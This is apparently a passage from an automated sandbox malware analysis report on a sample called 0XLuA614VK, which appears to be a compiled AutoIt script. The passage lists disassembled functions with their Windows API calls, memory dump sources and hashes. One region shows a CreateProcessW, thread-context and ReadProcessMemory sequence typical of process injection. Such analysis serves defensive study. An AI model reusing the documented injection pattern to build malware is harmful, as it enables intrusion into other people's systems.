                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleTime
                                                      • String ID:
                                                      • API String ID: 3397143404-0
                                                      • Opcode ID: bbc491888d37159442d1bca9580412af5fe494e69d5defd9b1c8670b8c62395d
                                                      • Instruction ID: f0907e2ff340b4fb816bac00f43e9049db736e8c0f45629bd9f489a932a65639
                                                      • Opcode Fuzzy Hash: bbc491888d37159442d1bca9580412af5fe494e69d5defd9b1c8670b8c62395d
                                                      • Instruction Fuzzy Hash: 87E0863268021477E6301759BC4DF8B3A5CD786B75F104320F759760D046A0150166E8
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 00F317F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: CALL
                                                      • API String ID: 1385522511-4196123274
                                                      • Opcode ID: 459f466bfd25b7a246418b69966e151c7d166be37a8f1a3fc3da6b05bd106242
                                                      • Instruction ID: e2b41817591969022be0a3d89a5e20b650578ad037a2b4a0f4215aee15dc7c77
                                                      • Opcode Fuzzy Hash: 459f466bfd25b7a246418b69966e151c7d166be37a8f1a3fc3da6b05bd106242
                                                      • Instruction Fuzzy Hash: 51228C71A08201DFC714DF14C880B2ABBF1BF89324F18892DF49A8B361D775E845EB92
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00F96F6B
                                                        • Part of subcall function 00F24ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24EFD
                                                      Strings
                                                      Similarity
                                                      • API ID: LibraryLoad_wcslen
                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                      • API String ID: 3312870042-2806939583
                                                      • Opcode ID: c8c7980f181b01a9779db22f9aed6b83e067c21f0bbf6802cdf2cc5daf98b50c
                                                      • Instruction ID: 0e055c8583eb2904398e30f500642c6b4a39e5003ae77549ee975136cbd63b3f
                                                      • Instruction Fuzzy Hash: 2AB1B0315183118FDB14FF20D8919AEB7E5BF94310F04882DF496972A2EB34ED49EB92
                                                      APIs
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00F62C8C
                                                        • Part of subcall function 00F23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F23A97,?,?,00F22E7F,?,?,?,00000000), ref: 00F23AC2
                                                        • Part of subcall function 00F22DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F22DC4
                                                      Strings
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen
                                                      • String ID: X
                                                      • API String ID: 779396738-3081909835
                                                      • Opcode ID: c49248ccd6b9e595c041d3f9bff73bf04e86d799e3bec86b2ff9b3bc4cde0fd7
                                                      • Instruction ID: 313453c0071b94f55fa725dbb3b907d8424d4dfc55cecceacf1951891f5454f5
                                                      • Instruction Fuzzy Hash: D9219671A0029C9BDB41EF94DC45BEE7BF8AF58314F004059E405EB241DBB85649AFA1
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID: EA06
                                                      • API String ID: 2638373210-3962188686
                                                      • Opcode ID: 3652412907e8be0dec7d857c5e42647c491fd6ec416f882d1a5ea0c8176a7d33
                                                      • Instruction ID: a7ca1aa24ce2a78313a76f3f127fd1fc87054ccab6fe237c7f40cf06e1b73b3d
                                                      • Instruction Fuzzy Hash: 9C01F572C042587EEF18C7A8CC16EAEBBF89B05301F00455EE552D21C1E4B8E6089B60
                                                      APIs
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F23908
                                                      Similarity
                                                      • API ID: IconNotifyShell_
                                                      • String ID:
                                                      • API String ID: 1144537725-0
                                                      • Opcode ID: 091e0c02bff29a18e92662b276767476d3fc9c810e773030925d0f1a4e8a9585
                                                      • Instruction ID: 6e570c2e7920862d91c3dc500439cebb25066290d16d9e4be21285d5b03d2acb
                                                      • Instruction Fuzzy Hash: 5931A0B1A04315CFD320DF24D8857A7BBE8FF49318F00092EF59987240E775AA44EB52
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 00F2BB4E
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID:
                                                      • API String ID: 1385522511-0
                                                      • Opcode ID: bbd3a9ea2e7939973b2726a052b1cf1efa3f183abf915729fa0ae7f5b8e41f23
                                                      • Instruction ID: 332c1795adc4154069eb4c1327556b8264dac93978bc6432709254bd17cbdf51
                                                      • Instruction Fuzzy Hash: 4C329F75E00219DFDB14CF54D894BBAB7B9EF44320F14805AED09AB251CB78ED81EB52
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01161A5B
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01161AF1
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01161B13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                      • Instruction ID: 51cce7e339274983fe122059e9caf3426fb81d6384cad4071d6fb3caeeb354e9
                                                      • Instruction Fuzzy Hash: FE12DE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F91CB5A
                                                      APIs
                                                        • Part of subcall function 00F24E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F24EDD,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24E9C
                                                        • Part of subcall function 00F24E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F24EAE
                                                        • Part of subcall function 00F24E90: FreeLibrary.KERNEL32(00000000,?,?,00F24EDD,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24EC0
                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24EFD
                                                        • Part of subcall function 00F24E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F63CDE,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24E62
                                                        • Part of subcall function 00F24E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F24E74
                                                        • Part of subcall function 00F24E59: FreeLibrary.KERNEL32(00000000,?,?,00F63CDE,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24E87
                                                      Similarity
                                                      • API ID: Library$Load$AddressFreeProc
                                                      • String ID:
                                                      • API String ID: 2632591731-0
                                                      • Opcode ID: 48f272f90b801678cab12ec9b0a626f0290c502518f9d1131789199655a7eb98
                                                      • Instruction ID: 8ea6cd67da7be5e131dab0a7be332f230bff5ae01d827ccb14521c1cbc050baa
                                                      • Instruction Fuzzy Hash: 4D11E732610615AADF14EB64ED12FAD77A5AF90B10F10842DF542AB1C1DEB8AE05BB90
                                                      APIs
                                                      Similarity
                                                      • API ID: __wsopen_s
                                                      • String ID:
                                                      • API String ID: 3347428461-0
                                                      • Opcode ID: 16cef2c9fe8d02f8faf20fbcb16d2f43b2c94a639e16c0eff98af7c367ea3678
                                                      • Instruction ID: e2e996385bfe147e688ea534f5d0dc0b1d2d7a8bd2fb116916875d0ad4a00abb
                                                      • Instruction Fuzzy Hash: 4411487190410AAFCB05DF58E9409DA7BF9EF48310F104059FD09AB312DA31DA16DBA4
                                                      APIs
                                                        • Part of subcall function 00F54C7D: RtlAllocateHeap.NTDLL(00000008,00F21129,00000000,?,00F52E29,00000001,00000364,?,?,?,00F4F2DE,00F53863,00FF1444,?,00F3FDF5,?), ref: 00F54CBE
                                                      • _free.LIBCMT ref: 00F5506C
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                      • Instruction ID: f136572af93f54b827410748478451c2842a5bda07bd49508ceb4a2ced94f2a6
                                                      • Instruction Fuzzy Hash: 0C014E726047055BE331CF59DC45A5AFBECFB85371F25051DEA84932C0E6306809C774
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                                      • Instruction ID: 0b8ec2d4a1c6c9e987b14229c96c0143848508e1a9bfd70e1dd8b31fdc2a5837
                                                      • Instruction Fuzzy Hash: 0CF07D33920A1096D7313A79DC05B573B9CAF52331F110715FD24932C1CB7CD806BAA5
                                                      APIs
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID:
                                                      • API String ID: 176396367-0
                                                      • Opcode ID: b69da61d860569f929b1c99c18b9dc9fd277deabbe59855a51152ec416ee2fb7
                                                      • Instruction ID: 113d01a34af7436988d9a70e855f50c5c0aade0350eca2cfdef07ba7523e0c10
                                                      • Instruction Fuzzy Hash: 1FF028B36006016ED7109F28DC06B67BB94EF44770F10852AFA19CB2D1DB75E414A7A0
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000008,00F21129,00000000,?,00F52E29,00000001,00000364,?,?,?,00F4F2DE,00F53863,00FF1444,?,00F3FDF5,?), ref: 00F54CBE
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 2a26d6b87ced5a659e46fffc1d6d319dc4228fe66824b570d90d617d0a482b52
                                                      • Instruction ID: 019d7d8ce26194f866b39d6433fd280d3244fa01008c80d295136cacd56a56cf
                                                      • Instruction Fuzzy Hash: C0F0E932A0223467DB215F629C0DB5B3B88BFC17BAB144111BE19F7281CA70F848B6F0
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,?,00FF1444,?,00F3FDF5,?,?,00F2A976,00000010,00FF1440,00F213FC,?,00F213C6,?,00F21129), ref: 00F53852
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 5d03e9a025b6e7ecb50eb9bafea2b216be1a3f2332e7c0e77efa803a8d3ef4c6
                                                      • Instruction ID: 6b3b88908014bfe6bfd8cb2a6b2e308a0dd947e55f5dd0a75c9d0151378738e8
                                                      • Instruction Fuzzy Hash: 54E0E533900624A6D635266F9C00B9B3A48AF427F3F090121BE14A3581CB61EE09B1E0
                                                      APIs
                                                      • _free.LIBCMT ref: 00F54D9C
                                                        • Part of subcall function 00F529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000), ref: 00F529DE
                                                        • Part of subcall function 00F529C8: GetLastError.KERNEL32(00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000,00000000), ref: 00F529F0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorFreeHeapLast_free
                                                      • String ID:
                                                      • API String ID: 1353095263-0
                                                      • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                      • Instruction ID: 230d0b17e569bcd11d12dbb3fe54816972e61f7bf55106c8748feeeb81d1212a
                                                      • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                      • Instruction Fuzzy Hash: CCE06D361002059F8720CE6CD800A92B7F4EF853257208529ED9DD3711D331F856DB80
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24F6D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 617a7892c9105bbef723717e6b1b977281622eb74d6ac2d18a5f84b9837b16a4
                                                      • Instruction ID: 68dfd6755f9b7f1257a8fdb9815127c3929d6768f0f947dd5970b317f7adc004
                                                      • Opcode Fuzzy Hash: 617a7892c9105bbef723717e6b1b977281622eb74d6ac2d18a5f84b9837b16a4
                                                      • Instruction Fuzzy Hash: D2F03071505761CFDB349F64E590912BBE4FF54329310897EE5EA83511C7B1A844EF50
                                                      APIs
                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F22DC4
                                                        • Part of subcall function 00F26B57: _wcslen.LIBCMT ref: 00F26B6A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath_wcslen
                                                      • String ID:
                                                      • API String ID: 541455249-0
                                                      • Opcode ID: 5347ebe147d11c0808e61bbfae23a0bb4acc4715346fe995e5a5cb7c1de1fb39
                                                      • Instruction ID: 39c80f495e7875dddc76ea07a913724f66d63737c204be4cf35e3b604e98eb1c
                                                      • Opcode Fuzzy Hash: 5347ebe147d11c0808e61bbfae23a0bb4acc4715346fe995e5a5cb7c1de1fb39
                                                      • Instruction Fuzzy Hash: FDE0CD726001245BC72092589C05FDA77DDDFC8790F050171FD09D7248D964AD809590
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID:
                                                      • API String ID: 2638373210-0
                                                      • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                      • Instruction ID: b629f9cbafb7097a2ff44290b71ed19e676b2289d91a1ea3810ac46d895c5774
                                                      • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                      • Instruction Fuzzy Hash: 31E04FB0609B005FDF799E28A8517B677E89F4A310F00086EF69B82652E57268459A4D
                                                      APIs
                                                        • Part of subcall function 00F23837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F23908
                                                        • Part of subcall function 00F2D730: GetInputState.USER32 ref: 00F2D807
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F22B6B
                                                        • Part of subcall function 00F230F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F2314E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                      • String ID:
                                                      • API String ID: 3667716007-0
                                                      • Opcode ID: dcad359377a48eef9b38ddb17f0a0cf809cc2b3b4dfce5480f1fed43df9020c5
                                                      • Instruction ID: 05d2b3a5349225deddd9b3af15e40c0142b059b4af2d009eecdf0b41d01197dd
                                                      • Opcode Fuzzy Hash: dcad359377a48eef9b38ddb17f0a0cf809cc2b3b4dfce5480f1fed43df9020c5
                                                      • Instruction Fuzzy Hash: 1DE0266230422C02CA04FB34BC524BDB349EFD2311F84053EF14243163CE2C4545B2A1
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00F60704,?,?,00000000,?,00F60704,00000000,0000000C), ref: 00F603B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 5671df99a47a9a5bb2eb8ed19d2bfa09b6d9f655e6da725e2d125c688130014e
                                                      • Instruction ID: 3b0fa7eaba43774650c55ffffa23dc0a2d161dc67636eb0b2ab30553845e96e6
                                                      • Opcode Fuzzy Hash: 5671df99a47a9a5bb2eb8ed19d2bfa09b6d9f655e6da725e2d125c688130014e
                                                      • Instruction Fuzzy Hash: E6D06C3214010DBBDF028F84DD46EDA3BAAFB48714F014100BE1866020C732E821AB90
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00F21CBC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem
                                                      • String ID:
                                                      • API String ID: 3098949447-0
                                                      • Opcode ID: a15f24c94591038db42154a89b43f8b0ac95154a6daeaa2066a37a8da8f74651
                                                      • Instruction ID: 5e982aab4f62ac04e6d8d39fd8e0f515c89d2d5e8ea755f460028cc65772f50f
                                                      • Opcode Fuzzy Hash: a15f24c94591038db42154a89b43f8b0ac95154a6daeaa2066a37a8da8f74651
                                                      • Instruction Fuzzy Hash: 59C09B3628030DDFF2144B80BC4AF217758B748F00F0C4001F609555E3C7A11410FA50
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: 722fb28b5875da46d23c66e04d0b27772e8baa09f743dcea15ae73cddc879b1d
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: 9F311275E0010A9BC718CF19D084A69FBA1FB49360F6492A5E80ACB616D731EEC4EBC0
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 011622B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                      • Instruction ID: c27871a870964bb75367f806710522e8f5d0f69529c2d75a17ab86bbfd2f00e0
                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                      • Instruction Fuzzy Hash: 58E0BF7494010EEFDB00EFE4D5496DE7BB4EF04711F1005A5FD05D7681DB319E648A62
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 011622B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction ID: a150d8eab7a162c449b742568b8293618a94f4e9cd71a30bcf089f2daecde8b5
                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction Fuzzy Hash: 84E0BF7494010E9FDB00EFA4D54969E7BB4EF04701F100165FD0192281D73199608A62
                                                      APIs
                                                        • Part of subcall function 00F39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F39BB2
                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00FB961A
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00FB965B
                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00FB969F
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FB96C9
                                                      • SendMessageW.USER32 ref: 00FB96F2
                                                      • GetKeyState.USER32(00000011), ref: 00FB978B
                                                      • GetKeyState.USER32(00000009), ref: 00FB9798
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00FB97AE
                                                      • GetKeyState.USER32(00000010), ref: 00FB97B8
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FB97E9
                                                      • SendMessageW.USER32 ref: 00FB9810
                                                      • SendMessageW.USER32(?,00001030,?,00FB7E95), ref: 00FB9918
                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00FB992E
                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00FB9941
                                                      • SetCapture.USER32(?), ref: 00FB994A
                                                      • ClientToScreen.USER32(?,?), ref: 00FB99AF
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00FB99BC
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00FB99D6
                                                      • ReleaseCapture.USER32 ref: 00FB99E1
                                                      • GetCursorPos.USER32(?), ref: 00FB9A19
                                                      • ScreenToClient.USER32(?,?), ref: 00FB9A26
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00FB9A80
                                                      • SendMessageW.USER32 ref: 00FB9AAE
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00FB9AEB
                                                      • SendMessageW.USER32 ref: 00FB9B1A
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00FB9B3B
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00FB9B4A
                                                      • GetCursorPos.USER32(?), ref: 00FB9B68
                                                      • ScreenToClient.USER32(?,?), ref: 00FB9B75
                                                      • GetParent.USER32(?), ref: 00FB9B93
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00FB9BFA
                                                      • SendMessageW.USER32 ref: 00FB9C2B
                                                      • ClientToScreen.USER32(?,?), ref: 00FB9C84
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00FB9CB4
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00FB9CDE
                                                      • SendMessageW.USER32 ref: 00FB9D01
                                                      • ClientToScreen.USER32(?,?), ref: 00FB9D4E
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00FB9D82
                                                        • Part of subcall function 00F39944: GetWindowLongW.USER32(?,000000EB), ref: 00F39952
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FB9E05
                                                      Strings
                                                      Memory Dump Source
